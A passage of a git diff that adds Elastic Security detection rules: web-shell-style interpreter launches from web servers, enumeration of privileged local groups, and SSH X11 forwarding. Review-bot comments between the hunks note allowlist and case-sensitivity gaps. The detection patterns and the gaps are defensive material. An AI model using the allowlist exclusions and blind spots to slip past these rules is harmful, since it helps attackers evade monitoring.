Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"w3wp.exe\", \"httpd.exe\", \"nginx.exe\", \"php.exe\", \"php-cgi.exe\", \"tomcat.exe\") and\n process.name : (\"cmd.exe\", \"cscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"wmic.exe\", \"wscript.exe\") and\n not \n (\n process.parent.name : (\"php.exe\", \"httpd.exe\") and process.name : \"cmd.exe\" and\n process.command_line : (\n \"cmd.exe /c mode CON\",\n \"cmd.exe /s /c \\\"mode CON\\\"\",\n \"cmd.exe /c \\\"mode\\\"\",\n \"cmd.exe /s /c \\\"tput colors 2>&1\\\"\"\n )\n )\n", + "references": [ + "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/", + "https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": 
"2917d495-59bd-4250-b395-c29409b76086", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": 
"https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + }, + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "2917d495-59bd-4250-b395-c29409b76086_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_211.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_211.json new file mode 100644 index 00000000000..2069abaf9ca --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_211.json 
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances of an unusual process enumerating built-in Windows privileged local groups membership like Administrators or Remote Desktop users.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Enumeration of Privileged Local Groups Membership", + "new_terms_fields": [ + "host.id", + "winlog.event_data.SubjectUserName", + "winlog.event_data.CallerProcessName" + ], + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:iam and event.action:user-member-enumerated and \n (\n group.name:(*Admin* or \"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\" or \"S-1-5-32-555\")\n ) and \n not (\n winlog.event_data.SubjectUserName: *$ or\n winlog.event_data.SubjectUserSid: (\"S-1-5-19\" or \"S-1-5-20\") or \n winlog.event_data.CallerProcessName:(\"-\" or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\VSSVC.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SearchIndexer.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CompatTelRunner.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\oobe\\\\\\\\msoobe.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\net1.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Netplwiz.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CloudExperienceHostBroker.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\RuntimeBroker.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiPrvSE.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SrTasks.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diskshadow.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dfsrs.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\vssadmin.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dllhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mmc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SettingSyncHost.exe or\n 
*\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\inetsrv\\\\\\\\w3wp.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wsmprovhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\spool\\\\\\\\drivers\\\\\\\\x64\\\\\\\\3\\\\\\\\x3jobt3?.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mstsc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\esentutl.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\RecoveryDrive.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SystemPropertiesComputerName.exe or\n *\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\ImmersiveControlPanel\\\\\\\\SystemSettings.exe or\n *\\:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\rubrik_vmware???\\\\\\\\snaptool.exe or\n *\\:\\\\\\\\Windows\\\\\\\\VeeamVssSupport\\\\\\\\VeeamGuestHelper.exe or\n ?\\:\\\\\\\\WindowsAzure\\\\\\\\*WaAppAgent.exe or\n ?\\:\\\\\\\\Program?Files?\\(x86\\)\\\\\\\\*.exe or\n ?\\:\\\\\\\\Program?Files\\\\\\\\*.exe or\n ?\\:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\*.exe\n )\n )\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallerProcessName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", + "setup": "## Setup\n\nThe 'Audit Security Group Management' audit policy must be 
configured (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 211 + }, + "id": "291a0de9-937a-4189-94c0-3e847c8b13e4_211", + "type": "security-rule" +} \ No newline at end of file 
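Review bot: The `setup` string near the end of this hunk describes enabling an EQL rule and the `event.ingested` fallback, but this rule is `"type": "new_terms"` with `"language": "kuery"`, so that paragraph belongs to a different rule type; reword it to say that `timestamp_override` on `event.ingested` needs the field populated on non-agent indices, or drop it. The `note` string likewise closes its account-compromise step with `after the registry modification`, which reads as copied from another guide, whereas this rule fires on group-membership enumeration, so `after the enumeration event` would be accurate. Both strings are repeated verbatim in the `_311` hunk that follows. Separately, the `?\:\\Program?Files\\*.exe` and `?\:\\Program?Files?\(x86\)\\*.exe` exclusions allowlist every executable under those directories by path alone, which matches the description's "excludes known legitimate utilities and programs installed" but leaves enumeration from an unsigned binary in those trees unseen; a sentence in the description or false-positive section making that trade-off explicit would help analysts tune exceptions.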
diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_311.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_311.json
new file mode 100644
index 00000000000..cfa07c738d8
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_311.json
@@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances of an unusual process enumerating built-in Windows privileged local groups membership like Administrators or Remote Desktop users.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "winlog.event_data.CallerProcessName": { + "case_insensitive": true, + "value": "C:\\\\Program Files (x86)\\\\*.exe" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "winlog.event_data.CallerProcessName": { + "case_insensitive": true, + "value": "C:\\\\Program Files\\\\*.exe" + } + } + } + } + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Enumeration of Privileged Local Groups Membership", + "new_terms_fields": [ + "host.id", + "winlog.event_data.SubjectUserName", + "winlog.event_data.CallerProcessName" + ], + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE 
'%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:iam and event.action:user-member-enumerated and \n (\n group.name:(*Admin* or \"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\" or \"S-1-5-32-555\")\n ) and \n not (\n winlog.event_data.SubjectUserName: *$ or\n winlog.event_data.SubjectUserSid: (\"S-1-5-19\" or \"S-1-5-20\") or \n winlog.event_data.CallerProcessName:(\"-\" or \n C\\:\\\\Windows\\\\System32\\\\VSSVC.exe or \n C\\:\\\\Windows\\\\System32\\\\SearchIndexer.exe or \n C\\:\\\\Windows\\\\System32\\\\CompatTelRunner.exe or \n C\\:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe or\n C\\:\\\\Windows\\\\System32\\\\net1.exe or \n C\\:\\\\Windows\\\\System32\\\\svchost.exe or \n C\\:\\\\Windows\\\\System32\\\\Netplwiz.exe or \n C\\:\\\\Windows\\\\System32\\\\msiexec.exe or\n C\\:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe or\n C\\:\\\\Windows\\\\System32\\\\RuntimeBroker.exe or\n C\\:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe or\n C\\:\\\\Windows\\\\System32\\\\SrTasks.exe or\n C\\:\\\\Windows\\\\System32\\\\diskshadow.exe or\n C\\:\\\\Windows\\\\System32\\\\dfsrs.exe or\n C\\:\\\\Windows\\\\System32\\\\vssadmin.exe or\n C\\:\\\\Windows\\\\System32\\\\dllhost.exe or\n C\\:\\\\Windows\\\\System32\\\\mmc.exe or\n C\\:\\\\Windows\\\\System32\\\\SettingSyncHost.exe or\n C\\:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe or\n C\\:\\\\Windows\\\\System32\\\\wsmprovhost.exe or\n C\\:\\\\Windows\\\\System32\\\\mstsc.exe or\n C\\:\\\\Windows\\\\System32\\\\esentutl.exe or\n C\\:\\\\Windows\\\\System32\\\\RecoveryDrive.exe or\n 
C\\:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe or\n C\\:\\\\Windows\\\\SysWOW64\\\\msiexec.exe or\n C\\:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe or\n C\\:\\\\Windows\\\\Temp\\\\rubrik_vmware*\\\\snaptool.exe or\n C\\:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe or\n C\\:\\\\WindowsAzure\\\\*WaAppAgent.exe or\n C\\:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\n )\n )\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallerProcessName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", + "setup": "## Setup\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions 
<8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 311 + }, + "id": "291a0de9-937a-4189-94c0-3e847c8b13e4_311", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_3.json b/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_3.json new file mode 100644 index 00000000000..3852d8403ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_3.json 
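Review bot: The two new `filters` entries carry `case_insensitive: true` for the Program Files exclusions, while the `C\:\\Windows\\System32\\...` list inside `query` is matched as written against `winlog.event_data.CallerProcessName`, so the two halves of the allowlist disagree on case handling; if that field is mapped as a plain keyword without a normalizer (its `required_fields` entry only says `"type": "unknown"`, so this is inferred), a path logged as `C:\WINDOWS\system32\svchost.exe` would slip past the KQL exclusions while the filter-based ones still apply. This hunk also narrows the drive-letter prefix from `*\:`/`?\:` in the `_211` version to a literal `C\:`, which changes behaviour on hosts whose system drive is not C:; if that is intended, a short sentence in `description` saying the exclusions assume a C: system drive would make it explicit, otherwise keeping `?\:` matches the Program Files filters' breadth.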
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for X11 forwarding via SSH. X11 forwarding is a feature that allows users to run graphical applications on a remote server and display the application's graphical user interface on their local machine. Attackers can abuse X11 forwarding for tunneling their GUI-based tools, pivot through compromised systems, and create covert communication channels, enabling lateral movement and facilitating remote control of systems within a network.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux SSH X11 Forwarding", + "note": "## Triage and analysis\n\n### Investigating Potential Linux SSH X11 Forwarding\n\nAttackers can leverage SSH X11 forwarding to capture a user's graphical desktop session and potentially execute unauthorized GUI applications remotely.\n\nThis rule looks for the execution of SSH in conjunction with command line arguments that are capable of setting up X11 forwarding. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network forwarding activity. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
